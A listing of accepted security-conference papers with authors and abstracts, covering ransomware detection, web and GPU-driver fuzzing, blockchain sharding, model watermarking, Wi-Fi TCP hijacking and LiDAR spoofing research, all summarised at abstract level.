Abstract: To evade existing antivirus software and detection systems, ransomware authors tend to obscure behavior differences with benign programs by imitating them or by weakening malicious behaviors during encryption. Existing defense solutions have limited effects on defending against evasive ransomware. Fortunately, through extensive observation, we find I/O behaviors of evasive ransomware exhibit a unique repetitiveness during encryption. This is rarely observed in benign programs. Besides, the $\chi^2$ test and the probability distribution of byte streams can effectively distinguish encrypted files from benignly modified files. Inspired by these, we first propose ERW-Radar, a detection system, to detect evasive ransomware accurately and efficiently. We make three breakthroughs: 1) a contextual \emph{Correlation} mechanism to detect malicious behaviors; 2) a fine-grained content \emph{Analysis} mechanism to identify encrypted files; and 3) adaptive mechanisms to achieve a better trade-off between accuracy and efficiency. Experiments show that ERW-Radar detects evasive ransomware with an accuracy of 96.18% while maintaining a FPR of 5.36%. The average overhead of ERW-Radar is 5.09% in CPU utilization and 3.80% in memory utilization.

Topic: Anti-malware techniques: detection, analysis, and prevention


EvoCrawl: Exploring Web Application Code and State using Evolutionary Search
Xiangyu Guo, Akshay Kawlay, Eric Liu, David Lie (University of Toronto)

Abstract: As more critical services move onto the web, it has become increasingly important to detect and address vulnerabilities in web applications. These vulnerabilities only occur under specific conditions: when 1) the vulnerable code is executed and 2) the web application is in the required state. If the application is not in the required state, then even if the vulnerable code is executed, the vulnerability may not be triggered. Previous work naively explores the application state by filling every field and triggering every JavaScript event before submitting HTML forms. However, this simplistic approach can fail to satisfy constraints between the web page elements, as well as input format constraints. To address this, we present EvoCrawl, a web crawler that uses evolutionary search to efficiently find different sequences of web interactions. EvoCrawl finds sequences that can successfully submit inputs to web applications and thus explore more code and server-side states than previous approaches. To assess the benefits of EvoCrawl we evaluate it against three state-of-the-art vulnerability scanners on ten web applications. We find that EvoCrawl achieves better code coverage due to its ability to execute code that can only be executed when the application is in a particular state. On average, EvoCrawl achieves a 59% increase in code coverage and successfully submits HTML forms 5$\times$ more frequently than the next best tool. By integrating IDOR and XSS vulnerability scanners, we used EvoCrawl to find eight zero-day IDOR and XSS vulnerabilities in WordPress, HotCRP, Kanboard, ImpressCMS, and GitLab.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


Explanation as a Watermark: Towards Harmless and Multi-bit Model Ownership Verification via Watermarking Feature Attribution
Shuo Shao, Yiming Li, Hongwei Yao, Yiling He, Zhan Qin, Kui Ren (Zhejiang University)

Abstract: Ownership verification is currently the most critical and widely adopted post-hoc method to safeguard model copyright. In general, model owners exploit it to identify whether a given suspicious third-party model is stolen from them by examining whether it has particular properties `inherited’ from their released models. Currently, backdoor-based model watermarks are the primary and cutting-edge methods to implant such properties in the released models. However, backdoor-based methods have two fatal drawbacks, including \emph{harmfulness} and \emph{ambiguity}. The former indicates that they introduce maliciously controllable misclassification behaviors ($i.e.$, backdoor) to the watermarked released models. The latter denotes that malicious users can easily pass the verification by finding other misclassified samples, leading to ownership ambiguity.

In this paper, we argue that both limitations stem from the ‘zero-bit’ nature of existing watermarking schemes, where they exploit the status ($i.e.$, misclassified) of predictions for verification. Motivated by this understanding, we design a new watermarking paradigm, $i.e.$, Explanation as a Watermark (EaaW), that implants verification behaviors into the explanation of feature attribution instead of model predictions. Specifically, EaaW embeds a ‘multi-bit’ watermark into the feature attribution explanation of specific trigger samples without changing the original prediction. We correspondingly design the watermark embedding and extraction algorithms inspired by explainable artificial intelligence. In particular, our approach can be used for different tasks ($e.g.$, image classification and text generation). Extensive experiments verify the effectiveness and harmlessness of our EaaW and its resistance to potential attacks.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Generating API Parameter Security Rules with LLM for API Misuse Detection
Jinghua Liu, Yi Yang, Kai Chen, Miaoqian Lin (Institute of Information Engineering, Chinese Academy of Sciences, Beijing, China; School of Cyber Security, University of Chinese Academy of Sciences, China)

Abstract: When utilizing library APIs, developers should follow the API security rules to mitigate the risk of API misuse. API Parameter Security Rule (APSR) is a common type of security rule that specifies how API parameters should be safely used and places constraints on their values. Failure to comply with the APSRs can lead to severe security issues, including null pointer dereference and memory corruption. Manually analyzing numerous APIs and their parameters to construct APSRs is labor-intensive and needs to be automated. Existing studies generate APSRs from documentation and code, but the missing information and limited analysis heuristics result in missing APSRs. Due to the superior Large Language Model’s (LLM) capability in code analysis and text generation without predefined heuristics, we attempt to utilize it to address the challenge encountered in API misuse detection. However, directly utilizing LLMs leads to incorrect APSRs which may lead to false bugs in detection, and overly general APSRs that could not generate applicable detection code resulting in many security bugs undiscovered.

In this paper, we present a new framework, named GPTAid, for automatic APSRs generation by analyzing API source code with LLM and detecting API misuse caused by incorrect parameter use. To validate the correctness of the LLM-generated APSRs, we propose an execution feedback-checking approach based on the observation that security-critical API misuse is often caused by APSRs violations, and most of them result in runtime errors. Specifically, GPTAid first uses LLM to generate raw APSRs and the Right calling code, and then generates Violation code for each raw APSR by modifying the Right calling code using LLM. Subsequently, GPTAid performs dynamic execution on each piece of Violation code and further filters out the incorrect APSRs based on runtime errors. To further generate concrete APSRs, GPTAid employs a code differential analysis to refine the filtered ones. Particularly, as the programming language is more precise than natural language, GPTAid identifies the key operations within Violation code by differential analysis, and then generates the corresponding concrete APSR based on the aforementioned operations. These concrete APSRs could be precisely interpreted into applicable detection code, which proven to be effective in API misuse detection. Implementing on the dataset containing 200 randomly selected APIs from eight popular libraries, GPTAid achieves a precision of 92.3%. Moreover, it generates 6 times more APSRs than state-of-the-art detectors on a comparison dataset of previously reported bugs and APSRs. We further evaluated GPTAid on 47 applications, 210 unknown security bugs were found potentially resulting in severe security issues (e.g., system crashes), 150 of which have been confirmed by developers after our reports.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Software/firmware/hardware security analysis, customization, and extensions


Heimdall: Towards Risk-Aware Network Management Outsourcing
Yuejie Wang (Peking University); Qiutong Men (New York University); Yongting Chen, Jiajin Liu (New York University Shanghai); Gengyu Chen (Carnegie Mellon University); Ying Zhang (Meta); Guyue Liu (Peking University); Vyas Sekar (Carnegie Mellon University)

Abstract: Enterprises are increasingly outsourcing network management (e.g., troubleshooting routing issues) to reduce cost and improve efficiency, either by hiring third-party contractors or by outsourcing to third-party vendors. Unfortunately, recent events have shown that this outsourcing model has become a new source of network incidents in customer networks. In this work, we argue that a risk-aware outsourcing approach is needed that enables customers to measure and assess risk transparently and make informed decisions to minimize harm. We first concretely define the notion of risk in the context of outsourced network management and then present an end-to-end framework, called Heimdall, which enables enterprises to assess, monitor, and respond to risk. Heimdall automatically builds a dependency graph to accurately assess the risk of an outsourced task, and uses a fine-grained reference monitor to monitor and mitigate potential risks during operation. Our expert validation results show that Heimdall effectively controls risk for outsourced network operations, resolving 92% of practical issues at the minimal risk level while incurring only a marginal timing overhead of approximately 7%.

Topics: Integrating security in network protocols (e.g., routing, naming, and management) and Network security policy implementation, deployment, and management


Horcrux: Synthesize, Split, Shift and Stay Alive; Preventing Channel Depletion via Universal and Enhanced Multi-hop Payments
Anqi Tian (Institute of Software, Chinese Academy of Sciences and School of Computer Science and Technology, University of Chinese Academy of Sciences); Peifang Ni (Institute of Software, Chinese Academy of Sciences and Zhongguancun Laboratory, Beijing, P.R.China); Yingzi Gao (Institute of Software, Chinese Academy of Sciences and School of Computer Science and Technology, University of Chinese Academy of Sciences); Jing Xu (Institute of Software, Chinese Academy of Sciences and Zhongguancun Laboratory, Beijing, P.R.China)

Abstract: Payment Channel Networks (PCNs) have been highlighted as viable solutions to address the scalability issues in current permissionless blockchains. They facilitate off-chain transactions, significantly reducing the load on the blockchain. However, the extensive reuse of multi-hop routes in the same direction poses a risk of channel depletion, resulting in involved channels becoming unidirectional or even closing, thereby compromising the sustainability and scalability of PCNs. Even more concerning, existing rebalancing protocol solutions heavily rely on trust assumptions and scripting languages, resulting in compromised universality and reliability.

In this paper, we present Horcrux, a universal and efficient multi-party virtual channel protocol without relying on extra trust assumptions, scripting languages, or the perpetual online requirement. Horcrux fundamentally addresses the channel depletion problem using a novel approach termed \textit{flow neutrality}, which minimizes the impact on channel balance allocations during multi-hop payments (MHPs). Additionally, we formalize the security properties of Horcrux by modeling it within the Global Universal Composability framework and provide a formal security proof.

We implement Horcrux on a real Lightning Network dataset, comprising 10,529 nodes and 38,910 channels, and compare it to the state-of-the-art rebalancing schemes such as Shaduf [NDSS’22], Thora [CCS’22], and Revive [CCS’17]. The experimental results demonstrate that (1) the entire process of Horcrux costs less than 1 USD, significantly lower than Shaduf; (2) Horcrux achieves a 12%-30% increase in payment success ratio and reduces user deposits required for channels by 70%-91%; (3) the performance of Horcrux improves by 1.2x-1.5x under long-term operation; and (4) Horcrux maintains a nearly zero channel depletion rate, whereas both Revive and Shaduf result in thousands of depleted channels.

Topic: Security and privacy for blockchains and cryptocurrencies


Incorporating Gradients to Rules: Towards Lightweight, Adaptive Provenance-based Intrusion Detection
Lingzhi Wang, Xiangmin Shen, Weijian Li (Northwestern University); Zhenyuan LI (Zhejiang University); R. Sekar (Stony Brook University); Han Liu, Yan Chen (Northwestern University)

Abstract: As cyber attacks grow increasingly sophisticated and stealthy, it becomes more imperative and challenging to detect intrusion from normal behaviors. Through fine-grained causality analysis, provenance-based intrusion detection systems (PIDS) demonstrated a promising capacity to distinguish benign and malicious behaviors, attracting widespread attention from both industry and academia. Among diverse approaches, rule-based PIDS stands out due to its lightweight overhead, real-time capabilities, and explainability. However, existing rule-based systems suffer low detection accuracy, especially the high false alarms, due to the lack of fine-grained rules and environment-specific configurations.

In this paper, we propose CAPTAIN, a rule-based PIDS capable of automatically adapting to diverse environments. Specifically, we propose three adaptive parameters to adjust the detection configuration with respect to nodes, edges, and alarm generation thresholds. We build a differentiable tag propagation framework and utilize the gradient descent algorithm to optimize these adaptive parameters based on the training data. We evaluate our system using data from DARPA Engagements and simulated environments. The evaluation results demonstrate that CAPTAIN enhances rule-based PIDS with learning capabilities, resulting in improved detection accuracy, reduced detection latency, lower runtime overhead, and more interpretable detection procedures and results compared to the state-of-the-art (SOTA) PIDS.

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response; Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Special problems and case studies: e.g., tradeoffs between security and efficiency, usability, cost, and ethics


Kronos: A Secure and Generic Sharding Blockchain Consensus with Optimized Overhead
Yizhong Liu, Andi Liu (Beihang University); Yuan Lu (Institute of Software Chinese Academy of Sciences); Zhuocheng Pan (Beihang University); Yinuo Li (Xi’an Jiaotong University); Jianwei Liu, Song Bian (Beihang University); Mauro Conti (University of Padua)

Abstract: Sharding enhances blockchain scalability by dividing the network into shards, each managing specific unspent transaction outputs or accounts. As an introduced new transaction type, cross-shard transactions pose a critical challenge to the security and efficiency of sharding blockchains. Currently, there is a lack of a generic sharding blockchain consensus pattern that achieves both security and low overhead.

In this paper, we present Kronos, a secure sharding blockchain consensus achieving optimized overhead. In particular, we propose a new \textit{secure sharding blockchain consensus pattern}, based on a \textit{buffer} managed jointly by shard members. Valid transactions are transferred to the payee via the buffer, while invalid ones are rejected through happy or unhappy paths. Kronos is proved to achieve \textit{security} \textit{with atomicity} under malicious clients while maintaining \textit{optimal intra-shard overhead}. Efficient rejection even requires no Byzantine fault tolerance (BFT) protocol execution in happy paths, and the cost in unhappy paths is still not higher than a two-phase commit. Besides, we propose secure cross-shard certification methods. Handling $b$ transactions, Kronos is proved to achieve cross-shard communication with low \textit{cross-shard overhead} $\mathcal{O}(n b \lambda)$ ($n$ for the shard size and $\lambda$ for the security parameter). Notably, Kronos imposes no restrictions on BFT and does not rely on timing assumptions, offering optional constructions in various modules. Kronos could serve as a universal framework for enhancing the performance and scalability of existing BFT protocols. Kronos supports generic models, including asynchronous networks, and can increase the throughput by several orders of magnitude.

We implement Kronos using two prominent BFT protocols: asynchronous Speeding Dumbo (NDSS’22) and partially synchronous Hotstuff (PODC’19). Extensive experiments (over up to 1000 AWS EC2 nodes across 4 AWS regions) demonstrate Kronos scales the consensus nodes to thousands, achieving a substantial throughput of 320 ktx/sec with 2.0 sec latency. Compared with the past solutions, Kronos outperforms, achieving up to a 12$\times$ improvement in throughput and a 50% reduction in latency when cross-shard transactions dominate the workload.

Topic: Security and privacy for blockchains and cryptocurrencies


LeakLess: Selective Data Protection against Memory Leakage Attacks for Serverless Platforms
Maryam Rostamipoor (Stony Brook University); Seyedhamed Ghavamnia (University of Connecticut); Michalis Polychronakis (Stony Brook University)

Abstract: As the use of language-level sandboxing for running untrusted code grows, the risks associated with memory disclosure vulnerabilities and transient execution attacks become increasingly significant. Besides the execution of untrusted JavaScript or WebAssembly code in web browsers, serverless environments have also started relying on language-level isolation to improve scalability by running multiple functions from different customers within a single process. Web browsers have adopted process-level sandboxing to mitigate memory leakage attacks, but this solution is not applicable in serverless environments, as running each function as a separate process would negate the performance benefits of language-level isolation.

In this paper we present LeakLess, a selective data protection approach for serverless computing platforms. LeakLess alleviates the limitations of previous selective data protection techniques by combining in-memory encryption with a separate I/O module to enable the safe transmission of the protected data between serverless functions and external hosts. We implemented LeakLess on top of the Spin serverless platform, and evaluated it with real-world serverless applications. Our results demonstrate that LeakLess offers robust protection while incurring a minor throughput decrease under stress-testing conditions of up to 2.8% when the I/O module runs on a different host than the Spin runtime, and up to 8.5% when it runs on the same host.

Topic: Security for cloud/edge computing


Magmaw: Modality-Agnostic Adversarial Attacks on Machine Learning-Based Wireless Communication Systems
Jung-Woo Chang, Ke Sun, Nasimeh Heydaribeni (University of California, San Diego); Seira Hidano (KDDI Research, Inc.); Xinyu Zhang, Farinaz Koushanfar (University of California, San Diego)

Abstract: Machine Learning (ML) has been instrumental in enabling joint transceiver optimization by merging all physical layer blocks of the end-to-end wireless communication systems. Although there have been a number of adversarial attacks on ML-based wireless systems, the existing methods do not provide a comprehensive view including multi-modality of the source data, common physical layer protocols, and wireless domain constraints. This paper proposes Magmaw, a novel wireless attack methodology capable of generating universal adversarial perturbations for any multimodal signal transmitted over a wireless channel. We further introduce new objectives for adversarial attacks on downstream applications. We adopt the widely used defenses to verify the resilience of Magmaw. For proof-of-concept evaluation, we build a real-time wireless attack platform using a software-defined radio system. Experimental results demonstrate that Magmaw causes significant performance degradation even in the presence of strong defense mechanisms. Furthermore, we validate the performance of Magmaw in two case studies: encrypted communication channel and channel modality-based ML model. Our code is available at https://github.com/juc023/Magmaw.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


MALintent: Coverage Guided Intent Fuzzing Framework for Android
Ammar Askar, Fabian Fleischer (Georgia Institute of Technology); Christopher Kruegel, Giovanni Vigna (University of California, Santa Barbara); Taesoo Kim (Georgia Institute of Technology)

Abstract: Intents are the primary message-passing mechanism on Android, used for both communication between intra-app and inter-app components. Intents go across the trust boundary of applications and can break the security isolation between them. Due to their shared API with intra-app communication, apps may unintentionally expose functionality leading to important security bugs. MALintent is an open-source fuzzing framework that uses novel coverage instrumentation techniques and customizable bug oracles to find security issues in Android Intent handlers. MALintent is the first Intent fuzzer that applies greybox fuzzing on compiled closed-source Android applications. We demonstrate techniques widely compatible with many versions of Android and our bug oracles were able to find several crashes, vulnerabilities with privacy implications, and memory-safety issues in the top-downloaded Android applications on the Google Play store.

Topic: Security and privacy of mobile/smartphone platforms and their operating systems


Manifoldchain: Maximizing Blockchain Throughput via Bandwidth-Clustered Sharding
Chunjiang Che (The Hong Kong University of Science and Technology (Guangzhou)); Songze Li (Southeast University); Xuechao Wang (The Hong Kong University of Science and Technology (Guangzhou))

Abstract: Bandwidth limitation is the major bottleneck that hinders scaling throughput of proof-of-work blockchains. To guarantee security, the mining rate of the blockchain is determined by the miners with the lowest bandwidth, resulting in an inefficient bandwidth utilization among fast miners. We propose Manifoldchain, an innovative blockchain sharding protocol that alleviates the impact of slow miners to maximize blockchain throughput. Manifoldchain utilizes a bandwidth-clustered shard formation mechanism that groups miners with similar bandwidths into the same shard. Consequently, this approach enables us to set an optimal mining rate for each shard based on its bandwidth, effectively reducing the waiting time caused by slow miners. Nevertheless, the adversary could corrupt miners with similar bandwidths, thereby concentrating hashing power and potentially creating an adversarial majority within a single shard. To counter this adversarial strategy, we introduce \textit{sharing mining}, allowing the honest mining power of the entire network to participate in the secure ledger formation of each shard, thereby achieving the same level of security as an unsharded blockchain. Additionally, we introduce an asynchronous atomic commitment mechanism to ensure transaction atomicity across shards with various mining rates. Our theoretical analysis demonstrates that Manifoldchain scales linearly in throughput with the increase in shard numbers and inversely with network delay in each shard. We implement a full system prototype of Manifoldchain, comprehensively evaluated on both simulated and real-world testbeds. These experiments validate its vertical scalability with network bandwidth and horizontal scalability with network size, achieving a substantial improvement of 186% in throughput over baseline sharding protocols, for scenarios where bandwidths of miners range from 5Mbps to 60Mbps.

Topic: Security and privacy for blockchains and cryptocurrencies


Mens Sana In Corpore Sano: Sound Firmware Corpora for Vulnerability Research
René Helmke (Fraunhofer FKIE); Elmar Padilla (Fraunhofer FKIE, Germany); Nils Aschenbruck (University of Osnabrück)

Abstract: Firmware corpora for vulnerability research should be \textit{scientifically sound}. Yet, several practical challenges complicate the creation of sound corpora: Sample acquisition, e.g., is hard and one must overcome the barrier of proprietary or encrypted data. As image contents are unknown prior analysis, it is hard to select \textit{high-quality} samples that can satisfy scientific demands.

Ideally, we help each other out by sharing data. But here, sharing is problematic due to copyright laws. Instead, papers must carefully document each step of corpus creation: If a step is unclear, replicability is jeopardized. This has cascading effects on result verifiability, representativeness, and, thus, soundness.

Despite all challenges, how can we maintain the soundness of firmware corpora? This paper thoroughly analyzes the problem space and investigates its impact on research: We distill practical binary analysis challenges that significantly influence corpus creation. We use these insights to derive guidelines that help researchers to nurture corpus replicability and representativeness. We apply them to 44 top tier papers and systematically analyze scientific corpus creation practices. Our comprehensive analysis confirms that there is currently no common ground in related work. It shows the added value of our guidelines, as they discover methodical issues in corpus creation and unveil miniscule step stones in documentation. These blur visions on representativeness, hinder replicability, and, thus, negatively impact the soundness of otherwise excellent work.

Finally, we show the feasibility of our guidelines and build a new corpus for large-scale analyses on Linux firmware: LFwC. We share rich meta data for good (and proven) replicability. We verify unpacking, deduplicate, identify contents, provide ground truth, and demonstrate LFwC’s utility for research.

Topics: Software/firmware/hardware security analysis, customization, and extensions and Special problems and case studies: e.g., tradeoffs between security and efficiency, usability, cost, and ethics


MineShark: Cryptomining Traffic Detection at Scale
Shaoke Xi, Tianyi Fu, Kai Bu, Chunling Yang, Zhihua Chang, Wenzhi Chen, Zhou Ma (Zhejiang University); Chongjie Chen, Yongsheng Shen (HANG ZHOU CITY BRAIN CO., LTD); Kui Ren (Zhejiang University)

Abstract: The rapid growth of cryptojacking and the increase in regulatory bans on cryptomining have prompted organizations to enhance detection ability within their networks. Traditional methods, including rule-based detection and deep packet inspection, fall short in timely and comprehensively identifying new and encrypted mining threats. In contrast, learning-based techniques show promise by identifying content-agnostic traffic patterns, adapting to a wide range of cryptomining configurations. However, existing learning-based systems often lack scalability in real-world detection, primarily due to challenges with unlabeled, imbalanced, and high-speed traffic inputs. To address these issues, we introduce MineShark, a system that identifies robust patterns of mining traffic to distinguish between vast quantities of benign traffic and automates the confirmation of model outcomes through active probing to prevent an overload of model alarms. As model inference labels are progressively confirmed, MineShark conducts self-improving updates to enhance model accuracy. MineShark is capable of line-rate detection at various traffic volume scales with the allocation of different amounts of CPU and GPU resources. In a 10 Gbps campus network deployment lasting ten months, MineShark detected cryptomining connections toward 105 mining pools ahead of concurrently deployed commercial systems, 17.6% of which were encrypted. It automatically filtered over 99.3% of false alarms and achieved an average packet processing throughput of 1.3 Mpps, meeting the line-rate demands of a 10 Gbps network, with a negligible loss rate of 0.2%. We publicize MineShark for broader use.

Topics: Anti-malware techniques: detection, analysis, and prevention and Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response


Misdirection of Trust: Demystifying the Abuse of Dedicated URL Shortening Service
Zhibo Zhang, Lei Zhang, Zhangyue Zhang, Geng Hong, Yuan Zhang, Min Yang (Fudan University)

Abstract: \underline{D}edicated \underline{U}RL \underline{s}hortening \underline{s}ervices (DUSSs) are designed to transform \textit{trusted} long URLs into the shortened links. Since DUSSs are widely used in famous corporations to better serve their large number of users (especially mobile users), cyber criminals attempt to exploit DUSS to transform their malicious links and abuse the inherited implicit trust, which is defined as \textit{Misdirection Attack} in this paper. However, little effort has been made to systematically understand such attacks. To fulfill the research gap, we present the first systematic study of the \textit{Misdirection Attack} in abusing DUSS to demystify its attack surface, exploitable scope, and security impacts in the real world.

Our study reveals that real-world DUSSs commonly rely on custom URL checks, yet they exhibit unreliable security assumptions regarding web domains and lack adherence to security standards. We design and implement a novel tool, Ditto, for empirically studying vulnerable DUSSs from a mobile perspective. Our large-scale study reveals that a quarter of the DUSSs are susceptible to \textit{Misdirection Attack}. More importantly, we find that DUSSs hold implicit trust from both their users and domain-based checkers, extending the consequences of the attack to stealthy phishing and code injection on users’ mobile phones. We have responsibly reported all of our findings to corporations of the affected DUSS and helped them fix their vulnerabilities.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


Moneta: Ex-Vivo GPU Driver Fuzzing by Recalling In-Vivo Execution States
Joonkyo Jung, Jisoo Jang, Yonsei University, Yongwan Jo (Department of Computer Science, Yonsei University); Jonas Vinck (DistriNet, KU Leuven); Alexios Voulimeneas (CYS, TU Delft); Stijn Volckaert (DistriNet, KU Leuven); Dokyung Song (Department of Computer Science, Yonsei University)

Abstract: Graphics Processing Units (GPUs) have become an indispensable part of modern computing infrastructure. They can execute massively parallel tasks on large data sets and have rich user space-accessible APIs for 3D rendering and general-purpose parallel programming. Unfortunately, the GPU drivers that bridge the gap between these APIs and the underlying hardware have grown increasingly large and complex over the years. Many GPU drivers now expose broad attack surfaces and pose serious security risks.

Fuzzing is a proven automated testing method that mitigates these risks by identifying potential vulnerabilities. However, when applied to GPU drivers, existing fuzzers incur high costs and scale poorly because they rely on physical GPUs. Furthermore, they achieve limited effectiveness because they often fail to meet dependency and timing constraints while generating and executing input events.

We present Moneta, a new ex-vivo approach to driver fuzzing that can statefully and effectively fuzz GPU drivers at scale. The key idea is (i) to recall past, in-vivo GPU driver execution states by synergistically combining snapshot-and-rehost and record-and-replay along with our proposed suite of GPU stack virtualization and introspection techniques, and (ii) to start parallel and stateful ex-vivo GPU driver fuzzing from the recalled states. We implemented a prototype of Moneta and evaluated it on three mainstream GPU drivers. Our prototype triggered deep, live GPU driver states during fuzzing, and found five previously unknown bugs in the NVIDIA GPU driver, three in the AMD Radeon GPU driver, and two in the ARM Mali GPU driver. These ten bugs were all confirmed by the respective vendors in response to our responsible disclosure, and five new CVEs were assigned.

Topic: Software/firmware/hardware security analysis, customization, and extensions


MTZK: Testing and Exploring Bugs in Zero-Knowledge (ZK) Compilers
Dongwei Xiao, Zhibo Liu, Yiteng Peng, Shuai Wang (The Hong Kong University of Science and Technology)

Abstract: Zero-knowledge (ZK) proofs have been increasingly popular in privacy-preserving applications and blockchain systems. To facilitate handy and efficient ZK proof generation for normal users, the industry has designed domain-specific languages (DSLs) and ZK compilers. Given a program in ZK DSL, a ZK compiler compiles it into a circuit, which is then passed to the prover and verifier for ZK checking. However, the correctness of ZK compilers is not well studied, and recent works have shown that de facto ZK compilers are buggy, which can allow malicious users to generate invalid proofs that are accepted by the verifier, causing security breaches and financial losses in cryptocurrency.

In this paper, we propose MTZK, a metamorphic testing framework to test ZK compilers and uncover incorrect compilations. Our approach leverages deliberately designed metamorphic relations (MRs) to mutate ZK compiler inputs. This way, ZK compilers can be automatically tested for compilation correctness using inputs and mutated variants. We propose a set of design considerations and optimizations to deliver an efficient and effective testing framework. In the evaluation of four industrial ZK compilers, we successfully uncovered 21 bugs, out of which the developers have promptly patched 15. We also show possible exploitations of the uncovered bugs to demonstrate their severe security implications.

Topics: Security and privacy for blockchains and cryptocurrencies and Software/firmware/hardware security analysis, customization, and extensions


Off-Path TCP Hijacking in Wi-Fi Networks: A Packet-Size Side Channel Attack
Ziqiang Wang (Southeast University); Xuewei Feng, Qi Li (Tsinghua University); Kun Sun (George Mason University); Yuxiang Yang (Tsinghua University); Mengyuan Li (University of Toronto); Ganqiu Du (China Software Testing Center); Ke Xu, Jianping Wu (Tsinghua University)

Abstract: In this paper, we unveil a fundamental side channel in Wi-Fi networks, specifically the observable frame size, which can be exploited by attackers to conduct TCP hijacking attacks. Despite the various security mechanisms (e.g., WEP and WPA2/WPA3) implemented to safeguard Wi-Fi networks, our study reveals that an off-path attacker can still extract sufficient information from the frame size side channel to hijack the victim’s TCP connection. Our side channel attack is based on two significant findings: (i) response packets (e.g., ACK and RST) generated by TCP receivers vary in size, and (ii) the encrypted frames containing these response packets have consistent and distinguishable sizes. By observing the size of the victim’s encrypted frames, the attacker can detect and hijack the victim’s TCP connections. We validate the effectiveness of this side channel attack through two case studies, i.e., SSH DoS and web traffic manipulation. Precisely, our attack can terminate the victim’s SSH session in 19 seconds and inject malicious data into the victim’s web traffic within 28 seconds. Furthermore, we conduct extensive measurements to evaluate the impact of our attack on real-world Wi-Fi networks. We test 30 popular wireless routers from 9 well-known vendors, and none of these routers can protect victims from our attack. Besides, we implement our attack in 80 real-world Wi-Fi networks and successfully hijack the victim’s TCP connections in 75 (93.75%) evaluated Wi-Fi networks. We have responsibly disclosed the vulnerability to the Wi-Fi Alliance and proposed several mitigation strategies to address this issue.

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response and Mobile and wireless network security


On the Realism of LiDAR Spoofing Attacks against Autonomous Driving Vehicle at High Speed and Long Distance
Takami Sato (University of California, Irvine, Department of Computer Science); Ryo Suzuki, Yuki Hayakawa, Kazuma Ikeda, Ozora Sako, Rokuto Nagata, Ryo Yoshida (Keio University, Department of Electronics and Electrical Engineering); Qi Alfred Chen (University of California, Irvine, Department of Computer Science); Kentaro Yoshioka (Keio University, Department of Electronics and Electrical Engineering)

Abstract: The rapid deployment of Autonomous Driving (AD) technologies on public roads presents significant social challenges. The security of LiDAR (Light Detection and Ranging) is one of the emerging challenges in AD deployment, given its crucial role in enabling Level 4 autonomy through accurate 3D environmental sensing. Recent lines of research have demonstrated that LiDAR can be compromised by LiDAR spoofing attacks that overwrite legitimate sensing by emitting malicious lasers to the LiDAR. However, previous studies have successfully demonstrated their attacks in controlled environments, yet gaps exist in the feasibility of their attacks in realistic high-speed, long-distance AD scenarios. To bridge these gaps, we design a novel Moving Vehicle Spoofing (MVS) system consisting of 3 subsystems: the LiDAR detection and tracking system, the auto-aiming system, and the LiDAR spoofing system. Furthermore, we design a new object removal attack, an adaptive high-frequency removal (A-HFR) attack, that can be effective even against recent LiDARs with pulse fingerprinting features, by leveraging gray-box knowledge of the scan timing of target LiDARs. With our MVS system, we are not only the first to demonstrate LiDAR spoofing attacks against practical AD scenarios where the victim vehicle is driving at high speeds (60 km/h) and the attack is launched from long distances (110 meters), but we are also the first to perform LiDAR spoofing attacks against a vehicle actually operated by a popular AD stack. Our object removal attack achieves ‚â•96% attack success rates against the vehicle driving at 60 km/h to the braking distances (20 meters). Finally, we discuss possible countermeasures against attacks with our MVS system. This study not only bridges critical gaps between LiDAR security and AD security research but also sets a foundation for developing robust countermeasures against emerging threats.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems)


Passive Inference Attacks on Split Learning via Adversarial Regularization
Xiaochen Zhu (National University of Singapore and Massachusetts Institute of Technology); Xinjian Luo (National University of Singapore and Mohamed bin Zayed University of Artificial Intelligence); Yuncheng Wu (Renmin University of China); Yangfan Jiang, Xiaokui Xiao, Beng Chin Ooi (National University of Singapore)

Abstract: Split Learning (SL) has emerged as a practical and efficient alternative to traditional federated learning. While previous attempts to attack SL have often relied on overly strong assumptions or targeted easily exploitable models, we seek to develop more capable attacks. We introduce SDAR, a novel attack framework against SL with an honest-but-curious server. SDAR leverages auxiliary data and adversarial regularization to learn a decodable simulator of the client’s private model, which can effectively infer the client’s private features under the vanilla SL, and both features and labels under the U-shaped SL. We perform extensive experiments in both configurations to validate the effectiveness of our proposed attacks. Notably, in challenging scenarios where existing passive attacks struggle to reconstruct the client’s private data effectively, SDAR consistently achieves significantly superior attack performance, even comparable to active attacks. On CIFAR-10, at the deep split level of 7, SDAR achieves private feature reconstruction with less than 0.025 mean squared error in both the vanilla and the U-shaped SL, and attains a label inference accuracy of over 98% in the U-shaped setting, while existing attacks fail to produce non-trivial results.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


PhantomLiDAR: Cross-modality Signal Injection Attacks against LiDAR
Zizhi Jin, Qinhong Jiang, Xuancun Lu, Chen Yan, Xiaoyu Ji, Wenyuan Xu (Zhejiang University)

Abstract: LiDAR (Light Detection and Ranging) is a pivotal sensor for autonomous driving, offering precise 3D spatial information. Previous signal attacks against LiDAR systems mainly exploit laser signals. In this paper, we investigate the possibility of cross-modality signal injection attacks, i.e., injecting intentional electromagnetic interference (IEMI) to manipulate LiDAR output. Our insight is that the internal modules of a LiDAR, i.e., the laser receiving circuit, the monitoring sensors, and the beam-steering modules, even with strict electromagnetic compatibility (EMC) testing, can still couple with the IEMI attack signals and result in the malfunction of LiDAR systems. Based on the above attack surfaces, we propose the \alias attack, which manipulates LiDAR output in terms of \textit{Points Interference}, \textit{Points Injection}, \textit{Points Removal}, and even \textit{LiDAR Power-Off}. We evaluate and demonstrate the effectiveness of \alias with both simulated and real-world experiments on five COTS LiDAR systems. We also conduct feasibility experiments in real-world moving scenarios. We provide potential defense measures that can be implemented at both the sensor level and the vehicle system level to mitigate the risks associated with IEMI attacks. Video demonstrations can be viewed at \textcolor{blue}{\href{https://sites.google.com/view/phantomlidar}{https://sites.google.com/view/phantomlidar}}.

